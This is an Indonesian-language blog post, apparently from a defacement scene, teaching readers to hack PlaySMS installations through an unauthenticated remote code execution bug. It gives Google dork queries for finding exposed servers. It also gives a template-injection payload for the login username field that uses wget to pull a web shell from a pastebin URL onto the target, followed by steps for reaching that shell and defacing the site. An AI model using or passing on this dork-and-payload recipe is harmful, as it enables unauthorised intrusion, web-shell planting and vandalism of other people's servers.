Deface POC PlaySMS Unauthenticated RCE Upload Shell

Deface POC PlaySMS Unauthenticated RCE Upload Shell



Yo mina :v , kali ini w mau bagiin tutorial deface PlaySMS Unauthenticated RCE Upload, tanpa basa basi langsung saja ok.

# Google Dork :
- inurl:?app=main intitle:sms
- inurl:?app=main intext:"recover password"
#Payload RCE : 
- {{`wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php`}}

Atau kalian bisa pakai payload lain selain ini gue pakai payload ini masuk sih tapi pas mau spawn kadang suka blank putih aja, atau kalian bisa buat shell sendiri. Usahakan mini shell yo. Oke lanjut


Langkah-Langkah Exploitasi

1. kalian dorking dulu

2. jika sudah menemukan target maka akan muncul tempat login

3. pada bagian username, masukkan payload rce : 
{{`wget https://pastebin.com/raw/YNpriSQu -O linuxploit.php`}}
Note : linuxploit.php bisa kalian ubah dengan nama sesuka kalian 

4. masukkan payload RCE pada username :

5. akses shell : target.com/namashell.php atau target.com/[path]/namashell.php
6. dan boom 

Source : Linuxploit.com

Kalau sudah seperti itu tinggal kalian upload shell saja. Mungkin sekian tutor dari w kurang lebih nya mohon maaf kalo belum paham contact me 👇


Arigato :'v

0 comments :

Post a Comment